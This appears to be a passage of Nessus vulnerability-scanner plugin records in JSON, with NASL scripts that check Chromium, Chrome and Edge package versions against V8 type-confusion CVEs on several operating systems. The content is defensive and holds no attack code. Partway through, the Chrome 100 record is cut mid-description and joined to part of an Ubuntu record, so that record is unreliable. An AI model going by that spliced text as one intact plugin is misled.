'cpu':'x86_64', 'release':'SUSE15.4', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var _cpu = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && _release) {\n if (rpm_check(release:_release, cpu:_cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'chromedriver / chromium');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-17T12:57:12", "description": "The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a vulnerability as referenced in the 2899da38-7300-11ed-92ce-3065ec8fd3ec advisory.\n\n - Type confusion in V8 in Google Chrome prior to 108.0.5359.94 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 
(Chromium security severity: High) (CVE-2022-4262)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-12-03T00:00:00", "type": "nessus", "title": "FreeBSD : chromium -- Type confusion in V8 (2899da38-7300-11ed-92ce-3065ec8fd3ec)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-4262"], "modified": "2023-09-20T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:chromium", "p-cpe:/a:freebsd:freebsd:ungoogled-chromium", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_2899DA38730011ED92CE3065EC8FD3EC.NASL", "href": "https://www.tenable.com/plugins/nessus/168387", "sourceData": "#%NASL_MIN_LEVEL 80900\n#\n# (C) Tenable, Inc.\n#\n# @NOAGENT@\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(168387);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/09/20\");\n\n script_cve_id(\"CVE-2022-4262\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/12/26\");\n script_xref(name:\"IAVA\", value:\"2022-A-0507-S\");\n\n script_name(english:\"FreeBSD : chromium -- Type confusion in V8 (2899da38-7300-11ed-92ce-3065ec8fd3ec)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a\nvulnerability as referenced in the 2899da38-7300-11ed-92ce-3065ec8fd3ec advisory.\n\n - Type confusion in V8 in Google Chrome prior to 108.0.5359.94 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. 
(Chromium security severity: High) (CVE-2022-4262)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://chromereleases.googleblog.com/2022/12/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?11d8a245\");\n # https://vuxml.freebsd.org/freebsd/2899da38-7300-11ed-92ce-3065ec8fd3ec.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?951eb4c0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-4262\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/12/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/12/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/12/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ungoogled-chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security 
Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"freebsd_package.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nvar flag = 0;\n\nvar packages = [\n 'chromium<108.0.5359.94',\n 'ungoogled-chromium<108.0.5359.94'\n];\n\nforeach var package( packages ) {\n if (pkg_test(save_report:TRUE, pkg: package)) flag++;\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : pkg_report_get()\n );\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-17T12:57:12", "description": "The remote Debian 11 host has packages installed that are affected by a vulnerability as referenced in the dsa-5295 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 108.0.5359.94 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 
(Chromium security severity: High) (CVE-2022-4262)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-12-05T00:00:00", "type": "nessus", "title": "Debian DSA-5295-1 : chromium - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-4262"], "modified": "2023-09-20T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:chromium", "p-cpe:/a:debian:debian_linux:chromium-common", "p-cpe:/a:debian:debian_linux:chromium-driver", "p-cpe:/a:debian:debian_linux:chromium-l10n", "p-cpe:/a:debian:debian_linux:chromium-sandbox", "p-cpe:/a:debian:debian_linux:chromium-shell", "cpe:/o:debian:debian_linux:11.0"], "id": "DEBIAN_DSA-5295.NASL", "href": "https://www.tenable.com/plugins/nessus/168400", "sourceData": "#%NASL_MIN_LEVEL 80900\n#\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory dsa-5295. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(168400);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/09/20\");\n\n script_cve_id(\"CVE-2022-4262\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/12/26\");\n script_xref(name:\"IAVA\", value:\"2022-A-0507-S\");\n\n script_name(english:\"Debian DSA-5295-1 : chromium - security update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Debian 11 host has packages installed that are affected by a vulnerability as referenced in the dsa-5295\nadvisory.\n\n - Type confusion in V8 in Google Chrome prior to 108.0.5359.94 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. 
(Chromium security severity: High) (CVE-2022-4262)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/source-package/chromium\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.debian.org/security/2022/dsa-5295\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2022-4262\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/bullseye/chromium\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the chromium packages.\n\nFor the stable distribution (bullseye), this problem has been fixed in version 108.0.5359.94-1~deb11u1.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-4262\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/12/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/12/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/12/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-driver\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-l10n\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-sandbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-shell\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:11.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar debian_release = get_kb_item('Host/Debian/release');\nif ( isnull(debian_release) ) audit(AUDIT_OS_NOT, 'Debian');\ndebian_release = chomp(debian_release);\nif (! 
preg(pattern:\"^(11)\\.[0-9]+\", string:debian_release)) audit(AUDIT_OS_NOT, 'Debian 11.0', 'Debian ' + debian_release);\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Debian', cpu);\n\nvar pkgs = [\n {'release': '11.0', 'prefix': 'chromium', 'reference': '108.0.5359.94-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-common', 'reference': '108.0.5359.94-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-driver', 'reference': '108.0.5359.94-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-l10n', 'reference': '108.0.5359.94-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-sandbox', 'reference': '108.0.5359.94-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-shell', 'reference': '108.0.5359.94-1~deb11u1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var _release = NULL;\n var prefix = NULL;\n var reference = NULL;\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['prefix'])) prefix = package_array['prefix'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (_release && prefix && reference) {\n if (deb_check(release:_release, prefix:prefix, reference:reference)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : deb_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = deb_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'chromium / chromium-common / chromium-driver / chromium-l10n / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-02T15:03:51", "description": "The version of Google Chrome installed on the remote Windows host is prior to 100.0.4896.127. 
It is, therefore, affected by a vulnerability as referenced in the 2022_04_stable-channel-update-for-desktop_14 advisory.\n\n - Type confusion in V8 Turbofan in Google Chrome prior to 100.0.4896.127 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2022-1364)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-04-14T00:00:00", "type": "nessus", "title": "Google Chrome < 100.0.4896.127 Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-1364"], "modified": "2023-11-01T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_100_0_4896_127.NASL", "href": "https://www.tenable.com/plugins/nessus/159741", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159741);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/01\");\n\n script_cve_id(\"CVE-2022-1364\");\n script_xref(name:\"IAVA\", value:\"2022-A-0156-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/06\");\n\n script_name(english:\"Google Chrome < 100.0.4896.127 Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is prior to 100.0.4896.127. It is, therefore, affected\nby a vulnerability as referenced in the 2022_04_stable-channel-update-for-desktop_14 advisory.\n\n - Type confusion in V8 Turbofan in Google Chrome prior to 100.0.4896.127 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. 
Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159243);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/07/12\");\n\n script_cve_id(\"CVE-2022-1096\");\n script_xref(name:\"USN\", value:\"5350-1\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"IAVA\", value:\"2022-A-0126-S\");\n\n script_name(english:\"Ubuntu 18.04 LTS : Chromium vulnerability (USN-5350-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 18.04 LTS host has packages installed that are affected by a vulnerability as referenced in the\nUSN-5350-1 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. 
(CVE-2022-1096)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-5350-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-1096\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:chromium-browser-l10n\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:chromium-chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:chromium-codecs-ffmpeg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:chromium-codecs-ffmpeg-extra\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu 
Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2022-2023 Canonical, Inc. / NASL script (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/Ubuntu/release');\nif ( isnull(os_release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nos_release = chomp(os_release);\nif (! ('18.04' >< os_release)) audit(AUDIT_OS_NOT, 'Ubuntu 18.04', 'Ubuntu ' + os_release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar pkgs = [\n {'osver': '18.04', 'pkgname': 'chromium-browser', 'pkgver': '99.0.4844.84-0ubuntu0.18.04.1'},\n {'osver': '18.04', 'pkgname': 'chromium-browser-l10n', 'pkgver': '99.0.4844.84-0ubuntu0.18.04.1'},\n {'osver': '18.04', 'pkgname': 'chromium-chromedriver', 'pkgver': '99.0.4844.84-0ubuntu0.18.04.1'},\n {'osver': '18.04', 'pkgname': 'chromium-codecs-ffmpeg', 'pkgver': '99.0.4844.84-0ubuntu0.18.04.1'},\n {'osver': '18.04', 'pkgname': 'chromium-codecs-ffmpeg-extra', 'pkgver': '99.0.4844.84-0ubuntu0.18.04.1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var osver = NULL;\n var pkgname = NULL;\n var pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, 
pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'chromium-browser / chromium-browser-l10n / chromium-chromedriver / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-04T15:17:44", "description": "The version of Google Chrome installed on the remote Windows host is prior to 99.0.4844.84. It is, therefore, affected by a vulnerability as referenced in the 2022_03_stable-channel-update-for-desktop_25 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2022-1096)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-03-25T00:00:00", "type": "nessus", "title": "Google Chrome < 99.0.4844.84 Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-1096"], "modified": "2023-11-03T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_99_0_4844_84.NASL", "href": "https://www.tenable.com/plugins/nessus/159235", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159235);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/03\");\n\n script_cve_id(\"CVE-2022-1096\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"IAVA\", value:\"2022-A-0126-S\");\n\n script_name(english:\"Google Chrome < 99.0.4844.84 Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote 
Windows host is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is prior to 99.0.4844.84. It is, therefore, affected\nby a vulnerability as referenced in the 2022_03_stable-channel-update-for-desktop_25 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2022-1096)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?671782b7\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1309225\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 99.0.4844.84 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-1096\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"stig_severity\", 
value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('SMB/Google_Chrome/Installed');\nvar installs = get_kb_list('SMB/Google_Chrome/*');\n\ngoogle_chrome_check_version(installs:installs, fix:'99.0.4844.84', severity:SECURITY_HOLE, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-04T15:17:13", "description": "The version of Microsoft Edge installed on the remote Windows host is prior to 99.0.1150.55. It is, therefore, affected by a vulnerability as referenced in the March 26, 2022 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 
(CVE-2022-1096)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-03-26T00:00:00", "type": "nessus", "title": "Microsoft Edge (Chromium) < 99.0.1150.55 Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-1096"], "modified": "2023-11-03T00:00:00", "cpe": ["cpe:/a:microsoft:edge"], "id": "MICROSOFT_EDGE_CHROMIUM_99_0_1150_55.NASL", "href": "https://www.tenable.com/plugins/nessus/159239", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159239);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/03\");\n\n script_cve_id(\"CVE-2022-1096\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"IAVA\", value:\"2022-A-0126-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0544-S\");\n\n script_name(english:\"Microsoft Edge (Chromium) < 99.0.1150.55 Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an web browser installed that is affected by a vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Microsoft Edge installed on the remote Windows host is prior to 99.0.1150.55. It is, therefore, affected\nby a vulnerability as referenced in the March 26, 2022 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. 
